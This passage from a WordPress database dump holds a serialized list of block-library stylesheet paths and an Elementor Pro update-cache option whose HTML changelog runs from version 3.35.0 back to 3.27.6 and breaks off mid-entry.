:34:\"navigation-link/editor-rtl.min.css\";i:270;s:26:\"navigation-link/editor.css\";i:271;s:30:\"navigation-link/editor.min.css\";i:272;s:29:\"navigation-link/style-rtl.css\";i:273;s:33:\"navigation-link/style-rtl.min.css\";i:274;s:25:\"navigation-link/style.css\";i:275;s:29:\"navigation-link/style.min.css\";i:276;s:33:\"navigation-submenu/editor-rtl.css\";i:277;s:37:\"navigation-submenu/editor-rtl.min.css\";i:278;s:29:\"navigation-submenu/editor.css\";i:279;s:33:\"navigation-submenu/editor.min.css\";i:280;s:25:\"navigation/editor-rtl.css\";i:281;s:29:\"navigation/editor-rtl.min.css\";i:282;s:21:\"navigation/editor.css\";i:283;s:25:\"navigation/editor.min.css\";i:284;s:24:\"navigation/style-rtl.css\";i:285;s:28:\"navigation/style-rtl.min.css\";i:286;s:20:\"navigation/style.css\";i:287;s:24:\"navigation/style.min.css\";i:288;s:23:\"nextpage/editor-rtl.css\";i:289;s:27:\"nextpage/editor-rtl.min.css\";i:290;s:19:\"nextpage/editor.css\";i:291;s:23:\"nextpage/editor.min.css\";i:292;s:24:\"page-list/editor-rtl.css\";i:293;s:28:\"page-list/editor-rtl.min.css\";i:294;s:20:\"page-list/editor.css\";i:295;s:24:\"page-list/editor.min.css\";i:296;s:23:\"page-list/style-rtl.css\";i:297;s:27:\"page-list/style-rtl.min.css\";i:298;s:19:\"page-list/style.css\";i:299;s:23:\"page-list/style.min.css\";i:300;s:24:\"paragraph/editor-rtl.css\";i:301;s:28:\"paragraph/editor-rtl.min.css\";i:302;s:20:\"paragraph/editor.css\";i:303;s:24:\"paragraph/editor.min.css\";i:304;s:23:\"paragraph/style-rtl.css\";i:305;s:27:\"paragraph/style-rtl.min.css\";i:306;s:19:\"paragraph/style.css\";i:307;s:23:\"paragraph/style.min.css\";i:308;s:35:\"post-author-biography/style-rtl.css\";i:309;s:39:\"post-author-biography/style-rtl.min.css\";i:310;s:31:\"post-author-biography/style.css\";i:311;s:35:\"post-author-biography/style.min.css\";i:312;s:30:\"post-author-name/style-rtl.css\";i:313;s:34:\"post-author-name/style-rtl.min.css\";i:314;s:26:\"post-author-name/style.css\";i:315;s:30:\"post-author-name/style.min.css\";i:316;s:25:\"post-author/style-rtl.css\";i:317;s:29:\"post-author/style-rtl.min.css\";i:318;s:21:\"post-author/style.css\";i:319;s:25:\"post-author/style.min.css\";i:320;s:33:\"post-comments-count/style-rtl.css\";i:321;s:37:\"post-comments-count/style-rtl.min.css\";i:322;s:29:\"post-comments-count/style.css\";i:323;s:33:\"post-comments-count/style.min.css\";i:324;s:33:\"post-comments-form/editor-rtl.css\";i:325;s:37:\"post-comments-form/editor-rtl.min.css\";i:326;s:29:\"post-comments-form/editor.css\";i:327;s:33:\"post-comments-form/editor.min.css\";i:328;s:32:\"post-comments-form/style-rtl.css\";i:329;s:36:\"post-comments-form/style-rtl.min.css\";i:330;s:28:\"post-comments-form/style.css\";i:331;s:32:\"post-comments-form/style.min.css\";i:332;s:32:\"post-comments-link/style-rtl.css\";i:333;s:36:\"post-comments-link/style-rtl.min.css\";i:334;s:28:\"post-comments-link/style.css\";i:335;s:32:\"post-comments-link/style.min.css\";i:336;s:26:\"post-content/style-rtl.css\";i:337;s:30:\"post-content/style-rtl.min.css\";i:338;s:22:\"post-content/style.css\";i:339;s:26:\"post-content/style.min.css\";i:340;s:23:\"post-date/style-rtl.css\";i:341;s:27:\"post-date/style-rtl.min.css\";i:342;s:19:\"post-date/style.css\";i:343;s:23:\"post-date/style.min.css\";i:344;s:27:\"post-excerpt/editor-rtl.css\";i:345;s:31:\"post-excerpt/editor-rtl.min.css\";i:346;s:23:\"post-excerpt/editor.css\";i:347;s:27:\"post-excerpt/editor.min.css\";i:348;s:26:\"post-excerpt/style-rtl.css\";i:349;s:30:\"post-excerpt/style-rtl.min.css\";i:350;s:22:\"post-excerpt/style.css\";i:351;s:26:\"post-excerpt/style.min.css\";i:352;s:34:\"post-featured-image/editor-rtl.css\";i:353;s:38:\"post-featured-image/editor-rtl.min.css\";i:354;s:30:\"post-featured-image/editor.css\";i:355;s:34:\"post-featured-image/editor.min.css\";i:356;s:33:\"post-featured-image/style-rtl.css\";i:357;s:37:\"post-featured-image/style-rtl.min.css\";i:358;s:29:\"post-featured-image/style.css\";i:359;s:33:\"post-featured-image/style.min.css\";i:360;s:34:\"post-navigation-link/style-rtl.css\";i:361;s:38:\"post-navigation-link/style-rtl.min.css\";i:362;s:30:\"post-navigation-link/style.css\";i:363;s:34:\"post-navigation-link/style.min.css\";i:364;s:27:\"post-template/style-rtl.css\";i:365;s:31:\"post-template/style-rtl.min.css\";i:366;s:23:\"post-template/style.css\";i:367;s:27:\"post-template/style.min.css\";i:368;s:24:\"post-terms/style-rtl.css\";i:369;s:28:\"post-terms/style-rtl.min.css\";i:370;s:20:\"post-terms/style.css\";i:371;s:24:\"post-terms/style.min.css\";i:372;s:31:\"post-time-to-read/style-rtl.css\";i:373;s:35:\"post-time-to-read/style-rtl.min.css\";i:374;s:27:\"post-time-to-read/style.css\";i:375;s:31:\"post-time-to-read/style.min.css\";i:376;s:24:\"post-title/style-rtl.css\";i:377;s:28:\"post-title/style-rtl.min.css\";i:378;s:20:\"post-title/style.css\";i:379;s:24:\"post-title/style.min.css\";i:380;s:26:\"preformatted/style-rtl.css\";i:381;s:30:\"preformatted/style-rtl.min.css\";i:382;s:22:\"preformatted/style.css\";i:383;s:26:\"preformatted/style.min.css\";i:384;s:24:\"pullquote/editor-rtl.css\";i:385;s:28:\"pullquote/editor-rtl.min.css\";i:386;s:20:\"pullquote/editor.css\";i:387;s:24:\"pullquote/editor.min.css\";i:388;s:23:\"pullquote/style-rtl.css\";i:389;s:27:\"pullquote/style-rtl.min.css\";i:390;s:19:\"pullquote/style.css\";i:391;s:23:\"pullquote/style.min.css\";i:392;s:23:\"pullquote/theme-rtl.css\";i:393;s:27:\"pullquote/theme-rtl.min.css\";i:394;s:19:\"pullquote/theme.css\";i:395;s:23:\"pullquote/theme.min.css\";i:396;s:39:\"query-pagination-numbers/editor-rtl.css\";i:397;s:43:\"query-pagination-numbers/editor-rtl.min.css\";i:398;s:35:\"query-pagination-numbers/editor.css\";i:399;s:39:\"query-pagination-numbers/editor.min.css\";i:400;s:31:\"query-pagination/editor-rtl.css\";i:401;s:35:\"query-pagination/editor-rtl.min.css\";i:402;s:27:\"query-pagination/editor.css\";i:403;s:31:\"query-pagination/editor.min.css\";i:404;s:30:\"query-pagination/style-rtl.css\";i:405;s:34:\"query-pagination/style-rtl.min.css\";i:406;s:26:\"query-pagination/style.css\";i:407;s:30:\"query-pagination/style.min.css\";i:408;s:25:\"query-title/style-rtl.css\";i:409;s:29:\"query-title/style-rtl.min.css\";i:410;s:21:\"query-title/style.css\";i:411;s:25:\"query-title/style.min.css\";i:412;s:25:\"query-total/style-rtl.css\";i:413;s:29:\"query-total/style-rtl.min.css\";i:414;s:21:\"query-total/style.css\";i:415;s:25:\"query-total/style.min.css\";i:416;s:20:\"query/editor-rtl.css\";i:417;s:24:\"query/editor-rtl.min.css\";i:418;s:16:\"query/editor.css\";i:419;s:20:\"query/editor.min.css\";i:420;s:19:\"quote/style-rtl.css\";i:421;s:23:\"quote/style-rtl.min.css\";i:422;s:15:\"quote/style.css\";i:423;s:19:\"quote/style.min.css\";i:424;s:19:\"quote/theme-rtl.css\";i:425;s:23:\"quote/theme-rtl.min.css\";i:426;s:15:\"quote/theme.css\";i:427;s:19:\"quote/theme.min.css\";i:428;s:23:\"read-more/style-rtl.css\";i:429;s:27:\"read-more/style-rtl.min.css\";i:430;s:19:\"read-more/style.css\";i:431;s:23:\"read-more/style.min.css\";i:432;s:18:\"rss/editor-rtl.css\";i:433;s:22:\"rss/editor-rtl.min.css\";i:434;s:14:\"rss/editor.css\";i:435;s:18:\"rss/editor.min.css\";i:436;s:17:\"rss/style-rtl.css\";i:437;s:21:\"rss/style-rtl.min.css\";i:438;s:13:\"rss/style.css\";i:439;s:17:\"rss/style.min.css\";i:440;s:21:\"search/editor-rtl.css\";i:441;s:25:\"search/editor-rtl.min.css\";i:442;s:17:\"search/editor.css\";i:443;s:21:\"search/editor.min.css\";i:444;s:20:\"search/style-rtl.css\";i:445;s:24:\"search/style-rtl.min.css\";i:446;s:16:\"search/style.css\";i:447;s:20:\"search/style.min.css\";i:448;s:20:\"search/theme-rtl.css\";i:449;s:24:\"search/theme-rtl.min.css\";i:450;s:16:\"search/theme.css\";i:451;s:20:\"search/theme.min.css\";i:452;s:24:\"separator/editor-rtl.css\";i:453;s:28:\"separator/editor-rtl.min.css\";i:454;s:20:\"separator/editor.css\";i:455;s:24:\"separator/editor.min.css\";i:456;s:23:\"separator/style-rtl.css\";i:457;s:27:\"separator/style-rtl.min.css\";i:458;s:19:\"separator/style.css\";i:459;s:23:\"separator/style.min.css\";i:460;s:23:\"separator/theme-rtl.css\";i:461;s:27:\"separator/theme-rtl.min.css\";i:462;s:19:\"separator/theme.css\";i:463;s:23:\"separator/theme.min.css\";i:464;s:24:\"shortcode/editor-rtl.css\";i:465;s:28:\"shortcode/editor-rtl.min.css\";i:466;s:20:\"shortcode/editor.css\";i:467;s:24:\"shortcode/editor.min.css\";i:468;s:24:\"site-logo/editor-rtl.css\";i:469;s:28:\"site-logo/editor-rtl.min.css\";i:470;s:20:\"site-logo/editor.css\";i:471;s:24:\"site-logo/editor.min.css\";i:472;s:23:\"site-logo/style-rtl.css\";i:473;s:27:\"site-logo/style-rtl.min.css\";i:474;s:19:\"site-logo/style.css\";i:475;s:23:\"site-logo/style.min.css\";i:476;s:27:\"site-tagline/editor-rtl.css\";i:477;s:31:\"site-tagline/editor-rtl.min.css\";i:478;s:23:\"site-tagline/editor.css\";i:479;s:27:\"site-tagline/editor.min.css\";i:480;s:26:\"site-tagline/style-rtl.css\";i:481;s:30:\"site-tagline/style-rtl.min.css\";i:482;s:22:\"site-tagline/style.css\";i:483;s:26:\"site-tagline/style.min.css\";i:484;s:25:\"site-title/editor-rtl.css\";i:485;s:29:\"site-title/editor-rtl.min.css\";i:486;s:21:\"site-title/editor.css\";i:487;s:25:\"site-title/editor.min.css\";i:488;s:24:\"site-title/style-rtl.css\";i:489;s:28:\"site-title/style-rtl.min.css\";i:490;s:20:\"site-title/style.css\";i:491;s:24:\"site-title/style.min.css\";i:492;s:26:\"social-link/editor-rtl.css\";i:493;s:30:\"social-link/editor-rtl.min.css\";i:494;s:22:\"social-link/editor.css\";i:495;s:26:\"social-link/editor.min.css\";i:496;s:27:\"social-links/editor-rtl.css\";i:497;s:31:\"social-links/editor-rtl.min.css\";i:498;s:23:\"social-links/editor.css\";i:499;s:27:\"social-links/editor.min.css\";i:500;s:26:\"social-links/style-rtl.css\";i:501;s:30:\"social-links/style-rtl.min.css\";i:502;s:22:\"social-links/style.css\";i:503;s:26:\"social-links/style.min.css\";i:504;s:21:\"spacer/editor-rtl.css\";i:505;s:25:\"spacer/editor-rtl.min.css\";i:506;s:17:\"spacer/editor.css\";i:507;s:21:\"spacer/editor.min.css\";i:508;s:20:\"spacer/style-rtl.css\";i:509;s:24:\"spacer/style-rtl.min.css\";i:510;s:16:\"spacer/style.css\";i:511;s:20:\"spacer/style.min.css\";i:512;s:20:\"table/editor-rtl.css\";i:513;s:24:\"table/editor-rtl.min.css\";i:514;s:16:\"table/editor.css\";i:515;s:20:\"table/editor.min.css\";i:516;s:19:\"table/style-rtl.css\";i:517;s:23:\"table/style-rtl.min.css\";i:518;s:15:\"table/style.css\";i:519;s:19:\"table/style.min.css\";i:520;s:19:\"table/theme-rtl.css\";i:521;s:23:\"table/theme-rtl.min.css\";i:522;s:15:\"table/theme.css\";i:523;s:19:\"table/theme.min.css\";i:524;s:24:\"tag-cloud/editor-rtl.css\";i:525;s:28:\"tag-cloud/editor-rtl.min.css\";i:526;s:20:\"tag-cloud/editor.css\";i:527;s:24:\"tag-cloud/editor.min.css\";i:528;s:23:\"tag-cloud/style-rtl.css\";i:529;s:27:\"tag-cloud/style-rtl.min.css\";i:530;s:19:\"tag-cloud/style.css\";i:531;s:23:\"tag-cloud/style.min.css\";i:532;s:28:\"template-part/editor-rtl.css\";i:533;s:32:\"template-part/editor-rtl.min.css\";i:534;s:24:\"template-part/editor.css\";i:535;s:28:\"template-part/editor.min.css\";i:536;s:27:\"template-part/theme-rtl.css\";i:537;s:31:\"template-part/theme-rtl.min.css\";i:538;s:23:\"template-part/theme.css\";i:539;s:27:\"template-part/theme.min.css\";i:540;s:24:\"term-count/style-rtl.css\";i:541;s:28:\"term-count/style-rtl.min.css\";i:542;s:20:\"term-count/style.css\";i:543;s:24:\"term-count/style.min.css\";i:544;s:30:\"term-description/style-rtl.css\";i:545;s:34:\"term-description/style-rtl.min.css\";i:546;s:26:\"term-description/style.css\";i:547;s:30:\"term-description/style.min.css\";i:548;s:23:\"term-name/style-rtl.css\";i:549;s:27:\"term-name/style-rtl.min.css\";i:550;s:19:\"term-name/style.css\";i:551;s:23:\"term-name/style.min.css\";i:552;s:28:\"term-template/editor-rtl.css\";i:553;s:32:\"term-template/editor-rtl.min.css\";i:554;s:24:\"term-template/editor.css\";i:555;s:28:\"term-template/editor.min.css\";i:556;s:27:\"term-template/style-rtl.css\";i:557;s:31:\"term-template/style-rtl.min.css\";i:558;s:23:\"term-template/style.css\";i:559;s:27:\"term-template/style.min.css\";i:560;s:27:\"text-columns/editor-rtl.css\";i:561;s:31:\"text-columns/editor-rtl.min.css\";i:562;s:23:\"text-columns/editor.css\";i:563;s:27:\"text-columns/editor.min.css\";i:564;s:26:\"text-columns/style-rtl.css\";i:565;s:30:\"text-columns/style-rtl.min.css\";i:566;s:22:\"text-columns/style.css\";i:567;s:26:\"text-columns/style.min.css\";i:568;s:19:\"verse/style-rtl.css\";i:569;s:23:\"verse/style-rtl.min.css\";i:570;s:15:\"verse/style.css\";i:571;s:19:\"verse/style.min.css\";i:572;s:20:\"video/editor-rtl.css\";i:573;s:24:\"video/editor-rtl.min.css\";i:574;s:16:\"video/editor.css\";i:575;s:20:\"video/editor.min.css\";i:576;s:19:\"video/style-rtl.css\";i:577;s:23:\"video/style-rtl.min.css\";i:578;s:15:\"video/style.css\";i:579;s:19:\"video/style.min.css\";i:580;s:19:\"video/theme-rtl.css\";i:581;s:23:\"video/theme-rtl.min.css\";i:582;s:15:\"video/theme.css\";i:583;s:19:\"video/theme.min.css\";}}','on');
INSERT INTO `wp_options` VALUES
(510034,'elementor_pro_remote_info_api_data_3.28.3','a:2:{s:7:\"timeout\";i:1770752622;s:5:\"value\";s:251606:\"{\"stable_version\":\"3.35.0\",\"last_updated\":\"2026-02-02 09:47:18\",\"sections\":\"a:2:{s:11:\\\"description\\\";s:161:\\\"Elementor Pro adds new features to the Elementor Page Builder plugin. Control your conversions, your user engagement, your entire website, from one page builder.\\\";s:9:\\\"changelog\\\";s:235700:\\\"<h2>Elementor Pro - by Elementor.com<\\/h2>\\n<h4>3.35.0 - 2026-02-02<\\/h4>\\n<ul>\\n<li>Tweak: Extended the color picker to support ACF fields - Editor V4<\\/li>\\n<li>Tweak: Enabled size variables with custom units across relevant controls - Editor V4<\\/li>\\n<li>Tweak: Enabled size variables in border radius controls - Editor V4<\\/li>\\n<\\/ul>\\n<h4>3.34.4 - 2026-01-29<\\/h4>\\n<ul>\\n<li>Fix: Shortcodes overflow the screen on Saved Templates screen in WordPress Admin<\\/li>\\n<li>Fix: Avoid Multiple Popups control does not work in Popups<\\/li>\\n<\\/ul>\\n<h4>3.34.3 - 2026-01-26<\\/h4>\\n<ul>\\n<li>Fix: Theme Builder WordPress view does not work as expected<\\/li>\\n<li>Fix: Submissions menu appears even when the setting is disabled<\\/li>\\n<\\/ul>\\n<h4>3.34.2 - 2026-01-22<\\/h4>\\n<ul>\\n<li>Tweak: Updated notification behavior in Elementor menu in WordPress admin<\\/li>\\n<\\/ul>\\n<h4>3.34.1 - 2026-01-20<\\/h4>\\n<ul>\\n<li>Tweak: Unified the Elementor interface into a single place to manage, optimize, and configure Elementor capabilities in WordPress admin<\\/li>\\n<\\/ul>\\n<h4>3.34.0 - 2025-12-22<\\/h4>\\n<ul>\\n<li>New: Added support for Display Conditions for Atomic Elements - Editor V4<\\/li>\\n<li>Tweak: Enabled media queries for the Desktop breakpoint only in Custom CSS - Editor V4<\\/li>\\n<li>Tweak: Added support for ACF field in Dynamic Tags - Editor V4<\\/li>\\n<li>Tweak: Added support for Google Calendar in Contact URL Dynamic Tag - Editor V4<\\/li>\\n<li>Tweak: Added support for Tel link in Contact URL Dynamic Tag - Editor V4<\\/li>\\n<li>Tweak: Added support for ACF Image field in Dynamic Tags - Editor V4<\\/li>\\n<li>Tweak: Removed icon from the accessibility tree in Flip Box widget<\\/li>\\n<li>Tweak: Applied CSS logical properties in text-align controls and improved RTL rendering in the Editor<\\/li>\\n<li>Fix: Website Template library displayed in English instead of the translated language<\\/li>\\n<li>Fix: Custom CSS field breaks when using certain characters - Editor V4<\\/li>\\n<\\/ul>\\n<h4>3.33.2 - 2025-12-03<\\/h4>\\n<ul>\\n<li>Fix: Incorrect status shown for Custom Code, Fonts, and Icons after importing a Website Template<\\/li>\\n<li>Fix: Display Conditions window appears empty in the editor<\\/li>\\n<\\/ul>\\n<h4>3.33.1 - 2025-11-11<\\/h4>\\n<ul>\\n<li>Fix: Styles not loading correctly in Custom Fonts and Custom Icons admin screens (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/33396\\\">#33396<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>3.33.0 - 2025-11-10<\\/h4>\\n<ul>\\n<li>New: Introducing Custom CSS for element-level styling with full isolation and responsive control - Editor V4<\\/li>\\n<li>New: Introducing media save to cloud in Website Templates, enabling users to store media assets directly in the cloud for easier access and management.<\\/li>\\n<li>Tweak: Added support for Post Excerpt dynamic tag - Editor V4<\\/li>\\n<li>Tweak: Added support for Internal URL dynamic tag - Editor V4<\\/li>\\n<li>Tweak: Added support for Post Terms dynamic tag - Editor V4<\\/li>\\n<li>Tweak: Added support for Shortcode dynamic tag - Editor V4<\\/li>\\n<li>Tweak: Added support for Popup dynamic tag - Editor V4<\\/li>\\n<li>Tweak: Added support for Off-Canvas dynamic tag - Editor V4<\\/li>\\n<li>Tweak: Added support for Lightbox dynamic tag - Editor V4<\\/li>\\n<li>Tweak: Added support for Add To Cart dynamic tag - Editor V4<\\/li>\\n<li>Tweak: Added support for ACF URL dynamic tag - Editor V4<\\/li>\\n<li>Tweak: Added support for Archive Title dynamic tag - Editor V4<\\/li>\\n<li>Tweak: Added support for the Email Contact URL dynamic tag - Editor V4<\\/li>\\n<li>Tweak: Added support for reduced-motion preferences in Flip Box widget<\\/li>\\n<li>Tweak: Updated minimum supported versions for Chrome, Firefox, and Safari<\\/li>\\n<li>Tweak: Updated Notes button location in the Editor Top Bar<\\/li>\\n<\\/ul>\\n<h4>3.32.3 - 2025-10-21<\\/h4>\\n<ul>\\n<li>Fix: Website Template fails to apply when Custom Code or Custom Icons are included<\\/li>\\n<\\/ul>\\n<h4>3.32.2 - 2025-09-29<\\/h4>\\n<ul>\\n<li>Fix: Exported taxonomies are not displayed correctly on the summary page in Website Templates export<\\/li>\\n<li>Fix: Certain taxonomies are not exported as expected in Website Templates export<\\/li>\\n<\\/ul>\\n<h4>3.32.1 - 2025-09-16<\\/h4>\\n<ul>\\n<li>Fix: Theme Builder fails to load when containers are disabled<\\/li>\\n<li>Fix: Popup and single product templates not imported or exported as expected<\\/li>\\n<\\/ul>\\n<h4>3.32.0 - 2025-09-15<\\/h4>\\n<ul>\\n<li>New: Introducing Size Variables to store and reuse numeric values across spacing, typography, layout, and borders - Editor V4<\\/li>\\n<li>New: Introducing granular Transitions with property-level control for advanced micro-animations - Editor V4<\\/li>\\n<li>New: Added granular content selection for Website Templates import and export, including pages, menus, post types, and taxonomies<\\/li>\\n<li>Tweak: Enhanced accessibility of background images in Slides widget with proper aria attributes (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/23543\\\">#23543<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/31063\\\">#31063<\\/a>)<\\/li>\\n<li>Tweak: Added REST API support for the Custom Code feature<\\/li>\\n<li>Tweak: Moved Background control from Content tab to Style tab in Flip Box widget<\\/li>\\n<li>Tweak: Removed SVG icons from the accessibility tree in Share Buttons widget<\\/li>\\n<li>Tweak: Removed dropdown indicator icons from the accessibility tree in WordPress Menu widget<\\/li>\\n<li>Fix: PHP 8.4 deprecation notices when running with <code>WP_DEBUG<\\/code> enabled<\\/li>\\n<li>Fix: Reduced-motion preferences are not applied to Animated Headline widget<\\/li>\\n<li>Fix: Reduced-motion preferences are not applied in Motion Effects<\\/li>\\n<li>Fix: Added required PHP and WordPress versions to the plugin header<\\/li>\\n<\\/ul>\\n<h4>3.31.3 - 2025-09-08<\\/h4>\\n<ul>\\n<li>Security Fix: Improved code security enforcement in WordPress Menu widget<\\/li>\\n<\\/ul>\\n<h4>3.31.2 - 2025-08-10<\\/h4>\\n<ul>\\n<li>Tweak: Improved release version functionality<\\/li>\\n<\\/ul>\\n<h4>3.31.1 - 2025-08-06<\\/h4>\\n<ul>\\n<li>Tweak: Updated <code>form-data<\\/code> package version<\\/li>\\n<\\/ul>\\n<h4>3.31.0 - 2025-08-05<\\/h4>\\n<ul>\\n<li>New: Introducing Attributes - add custom HTML attributes to elements for advanced control - Editor V4<\\/li>\\n<li>Tweak: Optimized Custom Code styles by removing redundant RTL file<\\/li>\\n<li>Tweak: Improved performance by loading ribbon styles only when used in Call to Action and Price Table widgets<\\/li>\\n<li>Tweak: Improved semantic markup structure for header and footer documents<\\/li>\\n<li>Tweak: Reorganized design controls in Animated Headline widget<\\/li>\\n<li>Tweak: Reorganized design controls in Blockquote widget<\\/li>\\n<li>Tweak: Reorganized design controls in Countdown widget<\\/li>\\n<li>Tweak: Replaced SASS mixins and functions with native CSS logical properties<\\/li>\\n<li>Fix: Empty headers are rendered in Table of Contents widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/28167\\\">#28167<\\/a>)<\\/li>\\n<li>Fix: <code>TypeError<\\/code> bug in Menu widget<\\/li>\\n<\\/ul>\\n<h4>3.30.1 - 2025-07-22<\\/h4>\\n<ul>\\n<li>Security Fix: Improved content sanitization in multiple widgets<\\/li>\\n<li>Fix: UI issue in Hotspot widget when Optimized Markup experiment is enabled<\\/li>\\n<li>Fix: Taxonomy filter not working in the Editor when Optimized Markup experiment is enabled<\\/li>\\n<\\/ul>\\n<h4>3.30.0 - 2025-07-01<\\/h4>\\n<ul>\\n<li>New: Introduced Full Website Templates in the Cloud - export, manage, and reuse full site kits across all your websites from one place<\\/li>\\n<li>Tweak: Activated "Optimized Markup" feature on new sites<\\/li>\\n<li>Tweak: Activated "Menu" feature on new sites<\\/li>\\n<li>Tweak: Improved error handling for Theme Builder display conditions<\\/li>\\n<li>Tweak: Added styling controls to Post Excerpt widget<\\/li>\\n<li>Tweak: Improved accessibility with <code>role<\\/code> and <code>aria-label<\\/code> attributes Post Navigation widget<\\/li>\\n<li>Tweak: Added <code>aria-label<\\/code> in Form widget<\\/li>\\n<li>Tweak: Added <code>aria-label<\\/code> in Login widget<\\/li>\\n<li>Tweak: Arranged content as lists in Portfolio and Posts widgets<\\/li>\\n<li>Tweak: Added Box Shadow and Text Shadow controls in Countdown widget<\\/li>\\n<li>Tweak: Moved image resolution control to content tab in Price List widget<\\/li>\\n<li>Tweak: Renamed and reorganized style sections in Price List widget<\\/li>\\n<li>Tweak: Added conditional logic to controls in Price Table widget<\\/li>\\n<li>Tweak: Grouped layout controls under list section in Price List widget<\\/li>\\n<li>Tweak: Updated minimum required WordPress version to 6.6<\\/li>\\n<li>Fix: Inline font icons support doesn\'t work in Post Navigation widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/24367\\\">#24367<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/18343\\\">#18343<\\/a>)<\\/li>\\n<li>Fix: Page Title condition doesn\'t work on child pages in Widget Display Conditions<\\/li>\\n<li>Fix: Editor users with "Access to edit content only" are able to delete elements<\\/li>\\n<li>Fix: Links are not crawlable in Video Playlist widget<\\/li>\\n<li>Fix: Uses hardcoded admin fonts in Video Playlist widget<\\/li>\\n<li>Fix: Editor freezes when the Form widget is used with a high PHP upload size limit<\\/li>\\n<li>Fix: Errors occur when Debug mode is enabled in Slides widget<\\/li>\\n<li>Fix: Plugin dependency not enforced in Elementor Pro<\\/li>\\n<li>Fix: Console shows deprecation warning in Global Widgets<\\/li>\\n<\\/ul>\\n<h4>3.29.2 - 2025-06-04<\\/h4>\\n<ul>\\n<li>Tweak: Added selectors to Menu widget for compatibility with Optimized Markup experiment<\\/li>\\n<\\/ul>\\n<h4>3.29.1 - 2025-05-28<\\/h4>\\n<ul>\\n<li>Security Fix: Improved code security enforcement in Animated Headline widget<\\/li>\\n<li>Security Fix: Improved code security enforcement in Price Table widget<\\/li>\\n<\\/ul>\\n<h4>3.29.0 - 2025-05-19<\\/h4>\\n<ul>\\n<li>New: Introduced Cloud Templates - save, manage, and reuse your templates across all your sites from a single cloud library<\\/li>\\n<li>Tweak: Improved accessibility with <code>role<\\/code> attributes in Share Buttons widget<\\/li>\\n<li>Tweak: Improved accessibility by grouping content with <code>role=region<\\/code> in the Video Playlist widget<\\/li>\\n<li>Fix: Focus color is not applied correctly for accessibility in WordPress Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/24239\\\">#24239<\\/a>)<\\/li>\\n<li>Fix: Common scripts loaded late when using the Theme Builder<\\/li>\\n<\\/ul>\\n<h4>3.28.4 - 2025-05-05<\\/h4>\\n<ul>\\n<li>Fix: Empty results appeared on the frontend when using the Taxonomy Filter with the \'Avoid Duplicates\' option in Loop Grid widget<\\/li>\\n<li>Fix: Errors occur when Debug mode is enabled and the Optimized Markup experiment is active<\\/li>\\n<\\/ul>\\n<h4>3.28.3 - 2025-04-16<\\/h4>\\n<ul>\\n<li>Tweak: Improved sidebar navigation flow on the Elementor Home screen<\\/li>\\n<\\/ul>\\n<h4>3.28.2 - 2025-03-30<\\/h4>\\n<ul>\\n<li>Fix: Default Elementor animation shown for logged-out users when using an "External URL" source in Lottie widget<\\/li>\\n<\\/ul>\\n<h4>3.28.1 - 2025-03-23<\\/h4>\\n<ul>\\n<li>Security Fix: Improved code security enforcement in Animated Headline and Form widgets<\\/li>\\n<\\/ul>\\n<h4>3.28.0 - 2025-03-17<\\/h4>\\n<ul>\\n<li>Tweak: Ensured File Upload field styles are overridden by global styles in Form widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11651\\\">#11651<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/17223\\\">#17223<\\/a>)<\\/li>\\n<li>Tweak: Updated Scroll Snap description to clarify incompatibility with animations and motion effects<\\/li>\\n<li>Tweak: Prevented special characters from being encoded in the email subject field in Form widget<\\/li>\\n<li>Tweak: Loaded module styles within the module instead of registering them in <code>plugin.php<\\/code><\\/li>\\n<li>Tweak: Updated minimum required WordPress version to 6.5<\\/li>\\n<li>Tweak: Improved keyboard accessibility for menus in Editor Top Bar<\\/li>\\n<li>Tweak: Made the edit button accessible in the Template widget<\\/li>\\n<li>Tweak: Optimized Form widget performance by caching field assets <code>using get_style_depends()<\\/code> and <code>get_script_depends()<\\/code> methods<\\/li>\\n<li>Tweak: Added Text Shadow control in Testimonial Carousel, Call to Action and Animated Headline widgets<\\/li>\\n<li>Fix: Button icon alignment breaks when Inline Font Icons feature is activated (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/16077\\\">#16077<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/16511\\\">#16511<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/17692\\\">#17692<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/17922\\\">#17922<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/19253\\\">#19253<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/19370\\\">#19370<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21236\\\">#21236<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21844\\\">#21844<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/28080\\\">#28080<\\/a>)<\\/li>\\n<li>Fix: Dropdown caret color did not follow menu item color when Inline Font Icons feature is activated (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/17500\\\">#17500<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/18466\\\">#18466<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21664\\\">#21664<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/24929\\\">#24929<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/28064\\\">#28064<\\/a>)<\\/li>\\n<li>Fix: Page doesn\'t scroll up when a coupon error notice appears in Checkout widget<\\/li>\\n<\\/ul>\\n<h4>3.27.7 - 2025-03-13<\\/h4>\\n<ul>\\n<li>Security Fix: Improved code security enforcement in Lottie widget<\\/li>\\n<\\/ul>\\n<h4>3.27.6 - 2025-03-10<\\/h4>\\n<ul>\\n<li>Security Fix: Improved code security 